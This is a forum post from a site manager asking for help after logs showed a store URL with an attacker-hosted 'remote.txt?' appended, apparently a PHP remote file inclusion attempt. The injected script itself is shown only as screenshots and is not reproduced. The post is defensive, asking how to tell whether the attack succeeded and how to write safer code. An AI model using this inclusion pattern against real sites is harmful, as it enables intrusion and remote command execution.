Hey folks, I could really use some advice from someone with more PHP experience than me. I apologize in advance for all the screenshots–I didn’t know as it’d be advisable to post the text of some of this.
Today I saw this odd URL in the logs for a site I’m managing for someone (and this isn’t one of my sites, so it’s not hosted at dreamhost so I can’t contact support about it–but I really am in over my head with this so I’m hoping someone here will help me anyway )
screenshot of URL (where the proper store URL would’ve been http://example.com/store.php ). That URL was requested three times in within a span of two minutes and ten seconds from three different IP addresses.
The http://ip address/dir/remote.txt? part of the URL yields a page that looks like it’s trying to inject a script that does…well, I have no idea what. Screenshot of that script passthru() works sorta like exec(), right? I’m slightly freaked about what might be happening especially after going to the URL that was being fetched by that script. I don’t really follow what’s happening in it.
I’m trying to figure out:
- what someone is attempting to exploit here
- how I might figure out whether the attempt succeeded or not
- what I need to go learn in order to make sure that the code I’m writing isn’t easily exploitable.
Nothing on the site was defaced, the crontab file is empty, and there’s nothing fishy-looking in the tmp directory (but there wouldn’t be, would there, based on what I could make of the script in that screenshot?)
Any advice would be much appreciated…